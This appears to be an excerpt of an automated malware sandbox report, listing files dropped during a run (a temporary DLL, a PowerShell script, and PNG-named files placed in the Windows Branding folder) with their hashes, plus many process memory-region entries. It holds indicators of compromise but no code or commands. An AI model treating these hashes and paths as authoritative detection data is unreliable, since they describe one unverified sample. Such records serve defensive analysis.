MD5 2bb5d4a9cb67f1d69e19a04c610e1aa3
SHA1 c4802dae620cc54c12fa9ada50d87f633505ec98
SHA256 2f27d71182119556497413082a9ea1f44a0119277d8e8a07064fc8661387dbb9
SHA512 5a6b75256a5a953a7d3defaaafe8637799a31c1b9bb1de9b9b249e0033f1187d5590076d9dae48c9d22f09a5e4306d824106d76cfd63eeeaac0a2f88a7ae2848

C:\Users\Admin\AppData\Local\Temp\lgm3nitg\lgm3nitg.dll

MD5 aa6426e73cfa9957b2a002c3866be48a
SHA1 db252d123fa4583da323c8d8db84213d75964a4e
SHA256 37ad29fb4dd4b095ef78de2bcd9b4159ba51e7eed0e09ef35214b1c322020cfa
SHA512 bca9653887009f6df2d5a62349e6a4bb12e6b9a395ae2897c4346130c91af7cbcf193df04d76603b12ef9003e56ef3885bc0f22c310ed3e0f2e03fb55a551d88

memory/3584-145-0x000002603DA90000-0x000002603DA91000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1

MD5 9fca6b1768eba2c5d42f189123152e32
SHA1 560ec3249af6e8d82e994554475b870d32145352
SHA256 c5c7012656bfebd5ba7d4ae8459bd2fcc57ac661e413e2b1da339b9fba86de1f
SHA512 b72f2bc28dcde144596eabb62375479c4ddb3b004ac8759ee9523170289f55572784e695a552fd612a5dc5a56f6c76b3baee9831c7cac7123f72b2eb2aadb3f2

memory/3584-152-0x000002603E2C0000-0x000002603E2C1000-memory.dmp

memory/3584-153-0x000002603E650000-0x000002603E651000-memory.dmp

memory/3584-160-0x00000260256F8000-0x00000260256F9000-memory.dmp

memory/804-161-0x0000000000000000-mapping.dmp

memory/804-170-0x0000020E44AF0000-0x0000020E44AF2000-memory.dmp

memory/804-171-0x0000020E44AF3000-0x0000020E44AF5000-memory.dmp

memory/804-174-0x0000020E44AF6000-0x0000020E44AF8000-memory.dmp

memory/1180-200-0x0000000000000000-mapping.dmp

memory/1180-213-0x000001EB77230000-0x000001EB77232000-memory.dmp

memory/804-212-0x0000020E44AF8000-0x0000020E44AFA000-memory.dmp

memory/1180-214-0x000001EB77233000-0x000001EB77235000-memory.dmp

memory/2568-241-0x0000000000000000-mapping.dmp

memory/1180-253-0x000001EB77238000-0x000001EB7723A000-memory.dmp

memory/1180-252-0x000001EB77236000-0x000001EB77238000-memory.dmp

memory/2568-254-0x0000024ACA5E0000-0x0000024ACA5E2000-memory.dmp

memory/2568-255-0x0000024ACA5E3000-0x0000024ACA5E5000-memory.dmp

memory/2568-288-0x0000024ACA5E6000-0x0000024ACA5E8000-memory.dmp

memory/2568-289-0x0000024ACA5E8000-0x0000024ACA5EA000-memory.dmp

memory/1636-299-0x0000000000000000-mapping.dmp

memory/1504-300-0x0000000000000000-mapping.dmp

memory/1816-301-0x0000000000000000-mapping.dmp

memory/1180-338-0x0000000000000000-mapping.dmp

memory/1848-339-0x0000000000000000-mapping.dmp

memory/2784-342-0x0000000000000000-mapping.dmp

memory/1192-343-0x0000000000000000-mapping.dmp

memory/4088-344-0x0000000000000000-mapping.dmp

memory/3104-345-0x0000000000000000-mapping.dmp

memory/2800-346-0x0000000000000000-mapping.dmp

memory/1096-347-0x0000000000000000-mapping.dmp

memory/2604-348-0x0000000000000000-mapping.dmp

memory/984-349-0x0000000000000000-mapping.dmp

\Windows\Branding\mediasrv.png

MD5 0750828e5a80dae0280c43945332e145
SHA1 fa1c85c33c0b99f8df14b6ccbd37f5df3d62c30c
SHA256 637dd8f4245397e281bf84433f75eeb40461e70e81a11a4c2c252dc8f9e4b947
SHA512 a45f4023f5d8951fef44bbe830c1b8992e7cb9c013882048d7227bac0c76869584c1ccc1d323803ced7a1e353998d0bface12eb9ef1dcd04e8e39b155528fd14

\Windows\Branding\mediasvc.png

MD5 0941efccfdbde6a619081456be071102
SHA1 4d9079f335bfdb4e88e022ffdd2193c4561f099d
SHA256 99dbace98f5f29a5c0c962db270dc195a8b6d2f8dbb009b79b929ff9d68d8281
SHA512 bbb587471dec6beae7852ae2ee1fff0efb26ce57ab69dbaf4385c965bf09a31be60c67951e52f488866daa0effab715e6b1a0aca5b02a7fdcc5dd586d84d56ab

memory/1880-352-0x0000000000000000-mapping.dmp

memory/1740-353-0x0000000000000000-mapping.dmp

memory/3848-354-0x0000000000000000-mapping.dmp

memory/352-355-0x0000000000000000-mapping.dmp

memory/852-356-0x0000000000000000-mapping.dmp

memory/1816-357-0x0000000000000000-mapping.dmp

memory/1432-359-0x0000000000000000-mapping.dmp

memory/1308-358-0x0000000000000000-mapping.dmp

memory/3332-360-0x0000000000000000-mapping.dmp

memory/3752-361-0x0000000000000000-mapping.dmp

memory/1756-362-0x0000000000000000-mapping.dmp

memory/1736-363-0x0000000000000000-mapping.dmp

memory/1568-364-0x0000000000000000-mapping.dmp

memory/3960-365-0x0000000000000000-mapping.dmp

memory/2260-366-0x0000000000000000-mapping.dmp

memory/1308-367-0x0000000000000000-mapping.dmp

memory/1308-380-0x000002177AD60000-0x000002177AD62000-memory.dmp

memory/1308-381-0x000002177AD63000-0x000002177AD65000-memory.dmp

memory/1308-382-0x000002177AD66000-0x000002177AD68000-memory.dmp

memory/1308-420-0x000002177AD68000-0x000002177AD69000-memory.dmp

memory/1728-452-0x0000000000000000-mapping.dmp

memory/3848-453-0x0000000000000000-mapping.dmp